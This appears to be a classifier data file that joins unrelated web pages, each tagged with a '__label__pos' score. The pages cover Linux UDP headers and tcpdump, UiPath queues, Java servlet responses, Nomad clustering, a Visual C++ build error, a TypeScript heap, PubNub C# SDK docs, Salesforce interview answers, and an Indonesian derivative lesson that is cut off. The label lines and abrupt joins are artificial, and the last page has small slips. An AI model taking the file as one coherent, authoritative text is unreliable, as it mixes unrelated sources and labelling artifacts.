lkml.org  [lkml]   [1996]   [Jul]   [11]   [last100]   RSS Feed Views: [wrap][no wrap]   [headers]  [forward]    Messages in this thread / Subjectlinux headers and tcpdump programs Date From I'm trying to port tcpdump 3.2.1a1 to linux The major problem is the elements of structures are called something else from the tcpdump/bsd implementatoin.... I think the way things are managed in headers files is somewhat backwards... For example, <net/udp.h> does: #include <linux/udp.h> #define UDP_NO_CHECK 0 extern struct proto udp_prot; extern void udp_err(int type, int code, unsigned char *header, __u32 daddr, __u32 saddr, struct inet_protocol *protocol); extern void udp_send_check(struct udphdr *uh, __u32 saddr, __u32 daddr, int len, struct sock *sk); extern int udp_recvfrom(struct sock *sk, unsigned char *to, int len, int noblock, unsigned flags, struct sockaddr_in *sin, int *addr_len); extern int udp_read(struct sock *sk, unsigned char *buff, int len, int noblock, unsigned flags); extern int udp_connect(struct sock *sk, struct sockaddr_in *usin, int addr_len); and linux/udp.h #ifndef _LINUX_UDP_H #define _LINUX_UDP_H struct udphdr { unsigned short source; unsigned short dest; unsigned short len; unsigned short check; }; The BSD udphdr structure is: ifndef _NETINET_UDP_H_ #define _NETINET_UDP_H_ /* * Udp protocol header. * Per RFC 768, September, 1981. */ struct udphdr { u_short uh_sport; /* source port */ u_short uh_dport; /* destination port */ short uh_ulen; /* udp length */ u_short uh_sum; /* udp checksum */ }; #endif I would imagine net/udp.h to have something like: #ifdef BSD_COMPAT struct udphdr { unsigned short uh_sport; unsigned short uh_dport; unsigned short uh_ulen; unsigned short uh_sum; }; #else struct udphdr { unsigned short source; unsigned short dest; unsigned short len; unsigned short check; }; #endif #ifdef __KERNEL__ #include <linux/udp.h> #endif Where linux/*.h contains linux/kernel dependcies...udphdr is pretty generic udp stuff...(so I don't see why its in linux/udp.h instead of net/udp.h) I want to see tools like tcpdump compile relatively cleanly. Comments? If this is a step in the right direction, I'll start making the changes. marty [email protected] Member of the League for Programming Freedom (http://www.lpf.org) Any sufficiently advanced technology is indistinguishable from magic Arthur C. Clarke, The Lost Worlds of 2001 \    \ /   Last update: 2005-03-22 13:37    [W:0.055 / U:0.112 seconds] ©2003-2020 Jasper Spaans|hosted at Digital Ocean and TransIP|Read the blog|Advertise on this site  
__label__pos
0.664915
End schedule after Queue is empty orchestrator schedule #1 Hello, I would like to know if it is possible to end a schedule in orchestrator after a queue is empty. At the moment, my schedule continues to run and gives error messages because it cannot find any items in the queue. Does someone have experience with this? Thanks! Robbert #2 Hi Robbert, Please check this post: You can express your opinion there or on this post regarding schedules: #3 So if I understand correctly it is not possible to command the robot to stop if a queue is empty? #4 You can within your workflow: to have a condition after Get transaction item trItem is nothing and if it’s false to continue with the item processing, if it’s true with a log message activity “No more items to process”. #5 Thanks!
__label__pos
0.998546
 [Java教程]java学习笔记—HttpServletResponse和HttpServletRequest(14) 你的位置:首页 > Java教程 [Java教程]java学习笔记—HttpServletResponse和HttpServletRequest(14) 如果开发者需要获取用户的请求那么请使用HttpServletRequest接口的对象。 如果开发者需要响应用户的请求那么请使用HttpServletResponse接口的对象。 HttpServletResponse接口 该接口默认继承ServletResponse接口。该接口的主要任务是处理响应头信息、以及处理客户端请求的响应体数据和Cookie的数据传输。 ServletResponse接口中常用的方法 核心的方法是给Response对象进行数据的输出。 ServletOutputStream getOutputStream()  获取响应对象的字节输出流PrintWriter getWriter()  获取响应对象的字符流对象setContentType(String type)  指定响应的数据的内容类型setCharacterEncoding(String charset)  指定响应数据的编码方式 HttpServletResponse接口中常用的方法 设置响应状态码和响应头信息setStatus(int sc) setHeader(String name, String value) 进行请求的重定向sendRedirect(String location) 进行Cookie数据传输void addCookie(Cookie cookie) 使用URL ReWritting技术实现会话String encodeURL(String url) String encodeRedirectURL(String url) 控制响应状态码和响应头 public void doGet(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException { // 设置响应状态码 response.setStatus(302); // 资源临时转移 // 设置响应头信息指定资源目前的最新地址 response.setHeader("location", "/day06/index.jsp"); } 问题: 对于一个不懂HTTP协议的人而言,以上的代码是写不出来的。 可以使用以下的语句进行替换: response.sendRedirect("/day06/index.jsp"); 字节流做响应体的输出 public void doGet(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException { // 通知浏览器以UTF-8的方式进行解码 response.setHeader("content-type", "text/html;charset=utf-8"); // 获取字节流对象 ServletOutputStream out = response.getOutputStream(); // 定义要输出的数据 String data = "hello<br/>"; // 输出数据 out.write(data.getBytes()); data = "<font color=\"blue\">this is a blue color!</font><br/>"; out.write(data.getBytes()); // 输出中文数据 data = "中国"; // 获取中文数据的UTF-8编码 out.write(data.getBytes("UTF-8")); // UTF-8 } 以上的代码中使用协议的语句可以使用以下的代码进行简化: response.setContentType("text/html;charset=utf-8"); 以上的代码可以使用模拟HTTP协议的meta标签进行简化: out.write("<meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\">".getBytes()); 如果使用字节流直接输出数字会怎样? // 输出int数据int num = 65;out.write(num); 由于浏览器是一个文本软件,那么在解析数字的时候都会默认的进行字符的转换,因此以上的代码显示的是A。如果要强行的输出65,那么需要使用out.write(“65”.getBytes()); 1 使用字节流输出图片 public void doGet(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException { // 获取网站对象 ServletContext context = this.getServletContext(); // 获取网站资源 String path = context.getRealPath("/imgs/美女.jpg"); File file = new File(path); System.out.println(file); // 设置响应头通知浏览器数据的处理方式 response.setHeader("content-disposition", "attachment;filename="+URLEncoder.encode(file.getName(),"utf-8")); // 处理文件名乱码 // 指定字节输入流对象 FileInputStream in = new FileInputStream(file); // 获取字节输出流对象 ServletOutputStream out = response.getOutputStream(); // 边读边写 byte [] b = new byte[1024]; int len = 0; while((len = in.read(b)) != -1){ out.write(b, 0, len); } // 释放资源 in.close(); } 如果一个网站中既有图片又有文本,那么需要使用什么流? Repsonse不可能同时获取字节流和字符流,对于以上的问题是由于HTTP通信原理没有掌握清楚才导致。浏览器发送请求处理的一定是页面,但是页面中的图片表现的形式不是字节流的方式而是<img serc=”url”/>直接发送给浏览器即可,浏览器会检索该src指定的路径继续发送请求以字节流的方式获取图片。
__label__pos
0.985764
Manual Clustering Manually bootstrapping a Nomad cluster does not rely on additional tooling, but does require operator participation in the cluster formation process. When bootstrapping, Nomad servers and clients must be started and informed with the address of at least one Nomad server. As you can tell, this creates a chicken-and-egg problem where one server must first be fully bootstrapped and configured before the remaining servers and clients can join the cluster. This requirement can add additional provisioning time as well as ordered dependencies during provisioning. First, we bootstrap a single Nomad server and capture its IP address. After we have that nodes IP address, we place this address in the configuration. For Nomad servers, this configuration may look something like this: server { enabled = true bootstrap_expect = 3 # This is the IP address of the first server we provisioned server_join { retry_join = ["<known-address>:4648"] } } Alternatively, the address can be supplied after the servers have all been started by running the server join command on the servers individually to cluster the servers. All servers can join just one other server, and then rely on the gossip protocol to discover the rest. $ nomad server join <known-address> For Nomad clients, the configuration may look something like: client { enabled = true servers = ["<known-address>:4647"] } The client node's server list can be updated at run time using the node config command. $ nomad node config -update-servers <IP>:4647 The port corresponds to the RPC port. If no port is specified with the IP address, the default RPC port of 4647 is assumed. As servers are added or removed from the cluster, this information is pushed to the client. This means only one server must be specified because, after initial contact, the full set of servers in the client's region are shared with the client.
__label__pos
0.675063
Thread: Xtree - '_Debug_Message' ? 1. #1 Registered User Join Date Jul 2007 Posts 2 Question Xtree - '_Debug_Message' ? I'm a student just learning C++ after a couple years of working with Java, so I'm an intermediate programmer, I'd say. I'm doing some homework in which I need to create a child class of the data container 'set', and I'm using Microsoft Visual C++ Studio 2005 to do it. I was doing fine until right up at the end, I made a small change in how an iterator was being incremented in the Union method and then my program would no longer compiled. I undid the change, and tried to recompile but I got the same error. Upon looking closer at the error message I see it doesn't even relate to my source, but "xtree" which I can only assume is the internal symbol linker(?) Can someone help me walk through correcting the error? I'd greatly appreciate the help, and can post the source on request. Here's the error message in it's entirety, and my source file is MySet.cpp: Code: ------ Build started: Project: MySet, Configuration: Debug Win32 ------ Compiling... MySet.cpp c:\program files\microsoft\visual studio 8\vc\include\xtree(245) : error C2146: syntax error : missing ';' before identifier '_Debug_message' c:\program files\microsoft\visual studio 8\vc\include\xtree(239) : while compiling class template member function 'const int &std::_Tree<_Traits>::const_iterator::operator *(void) const' with [ _Traits=std::_Tset_traits<int,std::less<int>,std::allocator<int>,false> ] c:\program files\microsoft\visual studio 8\vc\include\xtree(413) : see reference to class template instantiation 'std::_Tree<_Traits>::const_iterator' being compiled with [ _Traits=std::_Tset_traits<int,std::less<int>,std::allocator<int>,false> ] c:\program files\microsoft\visual studio 8\vc\include\xtree(533) : see reference to class template instantiation 'std::_Tree<_Traits>::iterator' being compiled with [ _Traits=std::_Tset_traits<int,std::less<int>,std::allocator<int>,false> ] c:\program files\microsoft\visual studio 8\vc\include\xtree(530) : while compiling class template member function 'std::_Tree<_Traits> &std::_Tree<_Traits>::operator =(const std::_Tree<_Traits> &)' with [ _Traits=std::_Tset_traits<int,std::less<int>,std::allocator<int>,false> ] c:\program files\microsoft\visual studio 8\vc\include\set(69) : see reference to class template instantiation 'std::_Tree<_Traits>' being compiled with [ _Traits=std::_Tset_traits<int,std::less<int>,std::allocator<int>,false> ] c:\documents and settings\jared\my documents\visual studio 2005\projects\myset\myset\myset.cpp(33) : see reference to class template instantiation 'std::set<_Kty>' being compiled with [ _Kty=int ] c:\documents and settings\jared\my documents\visual studio 2005\projects\myset\myset\myset.cpp(249) : see reference to class template instantiation 'MySet<Type>' being compiled with [ Type=int ] Build log was saved at "file://c:\Documents and Settings\Jared\My Documents\Visual Studio 2005\Projects\MySet\MySet\Debug\BuildLog.htm" MySet - 1 error(s), 0 warning(s) ========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ========== Last edited by Cabrill; 07-08-2007 at 06:51 PM. 2. #2 Registered User Join Date Jul 2007 Posts 2 Bleh, nevermind. Apparently when I made my iterator change it automatically opened the xtree file to show me at what point in the file it encounter the error, and I must have entered a stray character into it before closing it. After opening it up, and going to the line referenced in the error I found an errant '5' which I deleted. Afterwards it worked just fine...sorry for the disturbance. 3. #3 Cat without Hat CornedBee's Avatar Join Date Apr 2003 Posts 8,895 1) The Windows board is for programming problems that are specific to the Win32 API, or one of its wrappers. Please post questions such as these in the general C++ board. If they are about compiler configuration, please post them in tech. 2) You have homework that asks you to derive from std::set? All the buzzt! CornedBee "There is not now, nor has there ever been, nor will there ever be, any programming language in which it is the least bit difficult to write bad code." - Flon's Law Popular pages Recent additions subscribe to a feed
__label__pos
0.563241
Untitled [email protected] avatarunknown plain_text 2 months ago 2.7 kB 2 Indexable Never function getOrder(tasks: number[][]): number[] { let currentTime = 0; tasks = tasks.map((task, i) => [...task, i]).sort((a,b) => a[0] - b[0]); const tasksHeap = new TasksHeap([]); const orderedTasks: number[] = []; let index = 0; while(index < tasks.length || tasksHeap.size()) { if (!tasksHeap.size() && currentTime < tasks[index][0]) { currentTime = tasks[index][0]; } while(index < tasks.length && tasks[index][0] <= currentTime) { tasksHeap.insert(tasks[index]); index++; } const item = tasksHeap.popMin(); currentTime += item[1]; orderedTasks.push(item[2]); } return orderedTasks; }; class TasksHeap { private readonly data: number[][]; constructor(data: number[][]) { this.data = data; } swap(i: number, j: number) { const temp = this.data[i]; this.data[i] = this.data[j]; this.data[j] = temp; } heapify(i: number) { const leftNode = 2*i+1; const rightNode = 2*i+2; let minimalNode; if (leftNode <= this.data.length-1 && (this.data[leftNode][1] < this.data[i][1] || this.data[leftNode][1] === this.data[i][1] && this.data[leftNode][2] < this.data[i][2])) { minimalNode = leftNode; } else { minimalNode = i; } if (rightNode <= this.data.length-1 && (this.data[rightNode][1] < this.data[minimalNode][1] || this.data[rightNode][1] === this.data[minimalNode][1] && this.data[rightNode][2] < this.data[minimalNode][2])) { minimalNode = rightNode; } if (minimalNode !== i) { this.swap(i, minimalNode); this.heapify(minimalNode); } } heapifyUp(i: number) { const parentIndex = Math.floor((i-1) / 2); if (parentIndex >= 0 && (this.data[parentIndex][1] > this.data[i][1] || this.data[parentIndex][1] === this.data[i][1] && this.data[parentIndex][2] > this.data[i][2])){ this.swap(parentIndex, i); this.heapifyUp(parentIndex); } } size(): number { return this.data.length; } popMin(): number[] { const min = this.data[0]; this.swap(0, this.data.length-1); this.data.pop(); this.heapify(0); return min; } insert(item: number[]) { this.data.push(item); this.heapifyUp(this.data.length-1); } getHeap() { return this.data; } }
__label__pos
0.999927
C#C# V4 SDK 4.2.0.0   These docs are for PubNub 4.0 for C# which is our latest and greatest! For the docs of the 3.x versions of the SDK, please check the links: C#, Windows 8, Windows 8.1, ASP.Net, Windows Phone 8, Windows Phone 8.1, Xamarin.iOS, Xamarin.Android, Xamarin.Mac and C# PCL. If you have questions about the PubNub for C# SDK, please contact us at [email protected]. For .Net 3.5/4.0/4.5/4.61 For Xamarin.Android, Xamarin.iOS and .Net Core/.Net Standard For Universal Windows View Supported Platforms using PubnubApi; PNConfiguration pnConfiguration = new PNConfiguration(); pnConfiguration.SubscribeKey = "my_subkey"; pnConfiguration.PublishKey = "my_pubkey"; pnConfiguration.SecretKey = "my_secretkey"; pnConfiguration.LogVerbosity = PNLogVerbosity.BODY; pnConfiguration.Uuid = "PubNubCSharpExample"; Dictionary<string, string> message = new Dictionary<string, string>(); message.Add("msg", "hello"); Pubnub pubnub = new Pubnub(pnConfiguration); SubscribeCallbackExt subscribeCallback = new SubscribeCallbackExt( (pubnubObj, messageResult) => { if (messageResult != null) { Debug.WriteLine("In Example, SubscribeCallback received PNMessageResult"); Debug.WriteLine("In Example, SubscribeCallback messsage channel = " + messageResult.Channel); Debug.WriteLine("In Example, SubscribeCallback messsage channelGroup = " + messageResult.Subscription); Debug.WriteLine("In Example, SubscribeCallback messsage publishTimetoken = " + messageResult.Timetoken); Debug.WriteLine("In Example, SubscribeCallback messsage publisher = " + messageResult.Publisher); string jsonString = messageResult.Message.ToString(); Dictionary<string, string> msg = pubnub.JsonPluggableLibrary.DeserializeToObject<Dictionary<string,string>>(jsonString); Debug.WriteLine("msg: " + msg["msg"]); } }, (pubnubObj, presencResult) => { if (presencResult != null) { Debug.WriteLine("In Example, SubscribeCallback received PNPresenceEventResult"); Debug.WriteLine(presencResult.Channel + " " + presencResult.Occupancy + " " + presencResult.Event); } }, (pubnubObj, statusResult) => { if (statusResult.Category == PNStatusCategory.PNConnectedCategory) { pubnub.Publish() .Channel("my_channel") .Message(message) .Execute(new PNPublishResultExt((publishResult, publishStatus) => { if (!publishStatus.Error) { Debug.WriteLine(string.Format("DateTime {0}, In Publish Example, Timetoken: {1}", DateTime.UtcNow, publishResult.Timetoken)); } else { Debug.WriteLine(publishStatus.Error); Debug.WriteLine(publishStatus.ErrorData.Information); } })); } } ); pubnub.AddListener(subscribeCallback); pubnub.Subscribe<string>() .Channels(new string[]{ "my_channel" }).Execute(); In addition to the Hello World sample code, we also provide some copy and paste snippets of common API functions: Instantiate a new Pubnub instance. Only the SubscribeKey is mandatory. Also include PublishKey if you intend to publish from this instance, and the SecretKey if you wish to perform PAM administrative operations from this C# V4 instance.   For security reasons you should only include the secret-key on a highly secured server. The secret-key is only required for granting rights using our Access Manager. When you init with SecretKey, you get root permissions for the Access Manager. With this feature you don't have to grant access to your servers to access channel data. The servers get all access on all channels. PNConfiguration pnConfiguration = new PNConfiguration(); pnConfiguration.PublishKey = "my_pubkey"; pnConfiguration.SubscribeKey = "my_subkey"; pnConfiguration.Secure = false; Pubnub pubnub = new Pubnub(pnConfiguration); //Add listener to receive Publish messages and Presence events SubscribeCallbackExt generalSubscribeCallack = new SubscribeCallbackExt( delegate(Pubnub pubnubObj, PNMessageResult<object> message) { // Handle new message stored in message.Message }, delegate (Pubnub pubnubObj, PNPresenceEventResult presence) { // handle incoming presence data }, delegate (Pubnub pubnubObj, PNStatus status) { // the status object returned is always related to subscribe but could contain // information about subscribe, heartbeat, or errors // use the PNOperationType to switch on different options switch (status.Operation) { // let's combine unsubscribe and subscribe handling for ease of use case PNOperationType.PNSubscribeOperation: case PNOperationType.PNUnsubscribeOperation: // note: subscribe statuses never have traditional // errors, they just have categories to represent the // different issues or successes that occur as part of subscribe switch (status.Category) { case PNStatusCategory.PNConnectedCategory: // this is expected for a subscribe, this means there is no error or issue whatsoever break; case PNStatusCategory.PNReconnectedCategory: // this usually occurs if subscribe temporarily fails but reconnects. This means // there was an error but there is no longer any issue break; case PNStatusCategory.PNDisconnectedCategory: // this is the expected category for an unsubscribe. This means there // was no error in unsubscribing from everything break; case PNStatusCategory.PNUnexpectedDisconnectCategory: // this is usually an issue with the internet connection, this is an error, handle appropriately break; case PNStatusCategory.PNAccessDeniedCategory: // this means that PAM does allow this client to subscribe to this // channel and channel group configuration. This is another explicit error break; default: // More errors can be directly specified by creating explicit cases for other // error categories of `PNStatusCategory` such as `PNTimeoutCategory` or `PNMalformedFilterExpressionCategory` or `PNDecryptionErrorCategory` break; } break; case PNOperationType.PNHeartbeatOperation: // heartbeat operations can in fact have errors, so it is important to check first for an error. if (status.Error) { // There was an error with the heartbeat operation, handle here } else { // heartbeat operation was successful } break; default: // Encountered unknown status type break; } } ); pubnub.AddListener(generalSubscribeCallack); //Add listener to receive Signal messages SubscribeCallbackExt signalSubscribeCallback = new SubscribeCallbackExt( delegate (Pubnub pubnubObj, PNSignalResult<object> message) { // Handle new signal message stored in message.Message }, delegate (Pubnub pubnubObj, PNStatus status) { // the status object returned is always related to subscribe but could contain // information about subscribe, heartbeat, or errors } ); pubnub.AddListener(signalSubscribeCallback); //Add listener to receive User, Space and Membership events SubscribeCallbackExt objectsListenerSubscribeCallback = new SubscribeCallbackExt( delegate (Pubnub pnObj, PNObjectApiEventResult objectApiEventObj) { if (objectApiEventObj.Type == "user") { /* handle user related event. */ } else if (objectApiEventObj.Type == "space") { /* handle space related event. */ } else if (objectApiEventObj.Type == "membership") { /* handle membership related event. */ } }, delegate (Pubnub pnObj, PNStatus pnStatus) { /* handle state for any errors */ } )); pubnub.AddListener(objectsListenerSubscribeCallback); public class DevSubscribeCallback : SubscribeCallback { public override void Message<T>(Pubnub pubnub, PNMessageResult<T> message) { // Handle new message stored in message.Message } public override void Presence(Pubnub pubnub, PNPresenceEventResult presence) { // handle incoming presence data } public override void Signal<T>(Pubnub pubnub, PNSignalResult<T> signal) { // Handle new signal message stored in signal.Message } public override void Status(Pubnub pubnub, PNStatus status) { // the status object returned is always related to subscribe but could contain // information about subscribe, heartbeat, or errors // use the PNOperationType to switch on different options switch (status.Operation) { // let's combine unsubscribe and subscribe handling for ease of use case PNOperationType.PNSubscribeOperation: case PNOperationType.PNUnsubscribeOperation: // note: subscribe statuses never have traditional // errors, they just have categories to represent the // different issues or successes that occur as part of subscribe switch (status.Category) { case PNStatusCategory.PNConnectedCategory: // this is expected for a subscribe, this means there is no error or issue whatsoever break; case PNStatusCategory.PNReconnectedCategory: // this usually occurs if subscribe temporarily fails but reconnects. This means // there was an error but there is no longer any issue break; case PNStatusCategory.PNDisconnectedCategory: // this is the expected category for an unsubscribe. This means there // was no error in unsubscribing from everything break; case PNStatusCategory.PNUnexpectedDisconnectCategory: // this is usually an issue with the internet connection, this is an error, handle appropriately break; case PNStatusCategory.PNAccessDeniedCategory: // this means that PAM does allow this client to subscribe to this // channel and channel group configuration. This is another explicit error break; default: // More errors can be directly specified by creating explicit cases for other // error categories of `PNStatusCategory` such as `PNTimeoutCategory` or `PNMalformedFilterExpressionCategory` or `PNDecryptionErrorCategory` break; } break; case PNOperationType.PNHeartbeatOperation: // heartbeat operations can in fact have errors, so it is important to check first for an error. if (status.Error) { // There was an error with the heartbeat operation, handle here } else { // heartbeat operation was successful } break; default: // Encountered unknown status type break; } } public override void ObjectEvent(Pubnub pubnub, PNObjectApiEventResult objectEvent) { // handle incoming user, space and membership event data } }; //Usage of above listenerr DevSubscribeCallback regularListener = new DevSubscribeCallback(); pubnub.AddListener(regularListener); SubscribeCallbackExt listenerSubscribeCallack = new SubscribeCallbackExt( (pubnubObj, message) => { }, (pubnubObj, presence) => { }, (pubnubObj, status) => { }); pubnub.AddListener(listenerSubscribeCallack); // some time later pubnub.RemoveListener(listenerSubscribeCallack); CategoryDescription PNNetworkIssuesCategoryThe SDK is not able to reach the PubNub Data Stream Network because the machine or device are not connected to Internet or this has been lost, your ISP (Internet Service Provider) is having to troubles or perhaps or the SDK is behind of a proxy. PNUnknownCategoryPubNub SDK could return this Category if the captured error is insignificant client side error or not known type at the time of SDK development. PNBadRequestCategoryPubNub C# SDK will send PNBadRequestCategory when some parameter is missing like subscribe key, publish key. PNTimeoutCategoryProcessing has failed because of request time out. PNReconnectedCategory SDK was able to reconnect to pubnub. PNConnectedCategory SDK subscribed with a new mix of channels (fired every time the channel / channel group mix changed). Call Time to verify the client connectivity to the origin: pubnub.Time() .Execute(new PNTimeResultExt( (result, status) => { // handle time result. } )); pubnub.Subscribe<string>() .Channels(new string[] { // subscribe to channels "my_channel" }) .Execute(); The response of the call is handled by adding a Listener. Please see the Listeners section for more details. Listeners should be added before calling the method. Publish a message to a channel: string[] arrayMessage = new string[] { "hello", "there" }; pubnub.Publish() .Channel("suchChannel") .Message(arrayMessage.ToList()) .Execute(new PNPublishResultExt( (result, status) => { // handle publish result, status always present, result if successful // status.Error to see if error happened } )); Get occupancy of who's here now on the channel by UUID: Requires that the Presence add-on is enabled for your key. How do I enable add-on features for my keys? - see http://www.pubnub.com/knowledge-base/discussion/644/how-do-i-enable-add-on-features-for-my-keys pubnub.HereNow() // tailor the next two lines to example .Channels(new string[] { "coolChannel", "coolChannel2" }) .IncludeUUIDs(true) .Execute(new PNHereNowResultEx( (result, status) => { if (status.Error) { // handle error return; } if (result.Channels != null && result.Channels.Count > 0) { foreach (KeyValuePair<string, PNHereNowChannelData> kvp in result.Channels) { PNHereNowChannelData channelData = kvp.Value; Console.WriteLine("---"); Console.WriteLine("channel:" + channelData.ChannelName); Console.WriteLine("occupancy:" + channelData.Occupancy); Console.WriteLine("Occupants:"); if (channelData.Occupants != null && channelData.Occupants.Count > 0) { for (int index = 0; index < channelData.Occupants.Count; index++) { PNHereNowOccupantData occupant = channelData.Occupants[index]; Console.WriteLine(string.Format("uuid: {0}", occupant.Uuid)); Console.WriteLine(string.Format("state:{1}", (occupant.State != null) ? pubnub.JsonPluggableLibrary.SerializeToJsonString(occupant.State) : "")); } } } } } )); Subscribe to realtime Presence events, such as join, leave, and timeout, by UUID. Setting the presence attribute to a callback will subscribe to presents events on my_channel: Requires that the Presence add-on is enabled for your key. How do I enable add-on features for my keys? - see http://www.pubnub.com/knowledge-base/discussion/644/how-do-i-enable-add-on-features-for-my-keys pubnub.Subscribe<string>() .Channels(new string[] { // subscribe to channels "my_channel" }) .WithPresence() // also subscribe to related presence information .Execute(); The response of the call is handled by adding a Listener. Please see the Listeners section for more details. Listeners should be added before calling the method. Retrieve published messages from archival storage: Requires that the Storage and Playback add-on is enabled for your key. How do I enable add-on features for my keys? - see http://www.pubnub.com/knowledge-base/discussion/644/how-do-i-enable-add-on-features-for-my-keys pubnub.History() .Channel("history_channel") // where to fetch history from .Count(100) // how many items to fetch .Execute(new PNHistoryResultExt( (result, status) => { } )); pubnub.Unsubscribe<string>() .Channels(new string[] { "my_channel" }) .Execute(); The response of the call is handled by adding a Listener. Please see the Listeners section for more details. Listeners should be added before calling the method. For more details, please see the Destroy section. pubnub.Destroy();
__label__pos
0.984144
Home Interview Questions and Answers SalesForce Interview questions and Answers For Graduates Part-1 salesforce1. What is the difference between private cloud and public cloud ? Is salesforce.com is a private cloud and public cloud? Public Cloud: Cloud services are provided “aaS” as a Service over the Internet with little or no control over the underlying infrastructure.Same resources are used by more than one tenant(customer). Private Cloud: Cloud services are provide “as a service” but is deployed over a hosted data center or company intranet. This is private product for an organization offering advance security. Salesforce.com: Is a public cloud as data of more than one tenant resides on same servers and is hosted on salesforce.com data centers. 2. What are different kinds of reports? 1. Tabular: Tabular reports are the simplest and fastest way to look at data.They are made of ordered set of fields in columns, with each matching record listed in a row. They can’t be used to create charts or groups of data, and only can be used in dashboards if rows are limited.Tabular reports are best for creating a list with a single grand total or lists of records. Examples include activity reports and contact mailing lists. 2. Summary: These are similar to tabular reports, but they also allow users to view subtotals, create charts and group rows of data. They can be used as the source report for dashboard components. These are used for a report to show subtotals of the value of a particular field or when you want to create a hierarchical list, such as all opportunities for your team, subtotaled by Stage and Owner. On the report run page, summary reports with no groupings are shown as tabular reports. 3. Matrix: Matrix reports are similar to summary reports but allow you to group and summarize data by both rows and columns.For dashboard components, they can be used as the source report. Use this type for comparing related totals, especially if you have large amounts of data to summarize and you need to compare values in several different fields, or you want to look at data by date and by geography, product, or person.Matrix reports without at least one row and one column grouping show as summary reports on the report run page. 4. Joined: Joined reports let you create multiple report blocks that provide different views of your data. Each block acts like a “sub-report,” with its own columns, sorting, fields, and filtering. A joined report can even contain data from different report types. 3. What are different kinds of dashboard component? 1. Chart: If you want to show data graphically. 2. Gauge: If you have a single value which you want to show within a range of custom values. 3. Metric: It is used t when you have one key value to display. Enter metric labels directly on components by clicking the empty text field next to the grand total. Metric components placed directly above and below each other in a dashboard column are displayed together as a single component. 4. Table: It is used to show a set of report data in column form. 5. Visualforce Page: It is used t when you want to create a custom component or show information not available in another component type 6. Custom S-Control: It can contain any type of content that can be displayed or run in a browser, for example an ActiveX control, an Excel file, a Java applet,, or a custom HTML Web form 4. What actions can be performed using Workflows? Following workflow actions can be performed in a workflow: 1. Email Alert: Using an email template by a workflow rule or approval process, approval actions are generated and sent to Salesforce users or others, are called email alerts. 2. Field Update:Field updates are workflow and approval actions that specify the field you want updated and the new value for it. Depending on the type of field, you can choose to make the value blank , apply a specific value,, or calculate a value based on a formula you create. 3. Task: Assigns a task to a user you specify. You can specify the Status, Priority, Subject,, and Due Date of the task. Tasks are workflow and approval actions that are triggered by workflow rules or approval processes. 4. Outbound Message: An outbound message is a workflow, approval, or milestone action that sends the information you specify to an endpoint you designate, such as an external service.It the data in the specified fields in the form of a SOAP message to the endpoint. 5. What are groups in SFDC and what is their use? Groups are sets of users. They can contain individual users, other groups, the users in a particular role or territory, or the users in a particular role or territory plus all of the users below that role or territory in the hierarchy. There are two types of groups: Personal groups: Each user can create groups for their personal use. Public groups: Only administrators can create public groups. They can be used by everyone in the organization. You can use groups in the following ways: To set up default sharing access via a sharing rule To add multiple users to a Salesforce CRM Content library To share your records with other users To specify that you want to synchronize contacts owned by others users To assign users to specific actions in Salesforce Knowledge 6. What is Visualforce View State? Visualforce pages that contain a form component also contain an encrypted, hidden form field that encapsulates the view state of the page. This view state is automatically created, and as its name suggests, it holds the state of the page – state that includes the components, field values and controller state. 7. Which objects can be imported by Import Wizard? Following objects can be imported using import wizard. Accounts Contacts Leads Solutions Custom Objects 8. What is Profile and Components? profile contains user permissions and access settings that control what users can do within their organization. A collection of settings and permissions that define how a user accesses records – Determines how users see data and what they can do within the application – A profile can have many users, but a user can have only one profile Profiles Components: Which standard and custom apps users can view Which tabs users can view Which record types are available to users Which page layouts users see Object permissions that allow users to create, read, edit, and delete records Which fields within objects users can view and edit Permissions that allow users to manage the system and apps within it Which Apex classes and Visualforce pages users can access Which desktop clients users can access The hours during which and IP addresses from which users can log in Which service providers users can access (if Salesforce is enabled as an identity provider) 9. What is PermissionSet? PermissionSet represents a set of permissions that’s used to grant additional access to one or more users without changing their profile or reassigning profiles. You can use permission sets to grant access, but not to deny access. Every PermissionSet is associated with a user license. You can only assign permission sets to users who have the same user license that’s associated with the permission set. If you want to assign similar permissions to users with different licenses, create multiple permission sets with the same permissions, but with different licenses. Permission sets include settings for: Assigned apps Object settings, which include: Tab settings Object permissions Field permissions App permissions Apex class access Visualforce page access System permissions Service providers (only if you’ve enabled Salesforce as an identity provider) 10. Profile Vs Permission Sets Permissions and Access Settings? 1. User permissions and access settings specify what users can do within an organization. 2. Permissions and access settings are specified in user profiles and permission sets. Every user is assigned only one profile, but can also have multiple permission sets. 3. When determining access for your users, it’s a good idea to use profiles to assign the minimum permissions and access settings for specific groups of users, then use permission sets to grant additional permissions. The following table shows the types of permissions and access settings that are specified in profiles and permission sets. Some profile settings aren’t included in permission sets. You may also like Leave a Comment
__label__pos
0.740824
Himpasikom Learning Community Follow Himpasikom Learning Community Follow Mengenal Turunan Fungsi Photo by Jeswin Thomas on Unsplash Mengenal Turunan Fungsi Sarah Anjani's photo Sarah Anjani ·Dec 4, 2022· 5 min read Table of contents • Definisi • Sifat-Sifat Turunan • Latihan Soal Definisi Turunan fungsi \( f \) adalah fungsi \( f' \) yang nilainya di \( c \) adalah \[f' (c) = \lim_{h \to 0} \frac{f(c+h) - f(c)}{h}\] Jika \( f \) mempunyai turunan di setiap x anggota domain maka : \[f' (x) = \lim_{h \to 0} \frac{f(x+h) - f(x)}{h}\] Jika \( y = f(x) \) turunan \( y \) atau turunan \( f \) dinotasikan dengan \( y' \) , atau \( \left( \frac{dy}{dx} \right) dx \ dy \) , atau \( f'(x), \) atau \( \frac{df(x)}{dx} \) Sifat-Sifat Turunan Jika \( k \) suatu konstanta, \( f \) dan \( g \) fungsi-fungsi yang terdiferensialkan, \( u \) dan \( v \) fungsi-fungsi dalam \( x \) sehingga \( u = f(x) \) dan \( v = g(x) \) maka berlaku: 1. Jika \( y = k \ u \) maka \( y' = k(u') \) 2. Jika \( y = u + v \) maka \( y' = u' + v' \) 3. Jika \( y = u - v \) maka \( u' - v' \) 4. Jika \( y = u \ v \) maka \( y' = u' \ v + u \ v' \) 5. Jika \( y = \frac{u}{v} \) maka \( y' = \frac{ u' \ v - u \ v' }{ v^2 } \) Latihan Soal Mencari \( \frac{dy}{dx} \) untuk soal berikut ini $$ \begin{align} \text{1. } \ y &= ( 3x^4 + 2x^2 + x ) ( x^2 + 7 ) \hspace{100cm} 